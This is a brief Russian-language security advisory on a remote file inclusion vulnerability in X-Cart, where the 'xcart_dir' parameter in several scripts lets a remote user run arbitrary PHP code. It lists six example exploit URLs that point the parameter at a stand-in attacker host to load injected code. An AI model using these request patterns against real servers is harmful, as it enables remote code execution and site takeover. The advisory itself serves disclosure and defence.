Программа: X-Cart

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «xcart_dir» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

http://www.target.com/[xcart-path]/config.php?xcart_dir=http://urhost/[inject]?
http://www.target.com/[xcart-path]/prepare.php?xcart_dir=http://urhost/[inject]?
http://www.target.com/[xcart-path]/smarty.php?xcart_dir=http://urhost/[inject]?
http://www.target.com/[xcart-path]/customer/product.php?xcart_dir=http://urhost/[inject]?
http://www.target.com/[xcart-path]/provider/auth.php?xcart_dir=http://urhost/[inject]?
http://www.target.com/[xcart-path]/admin/auth.php?xcart_dir=http://urhost/[inject]?



Оставить мнение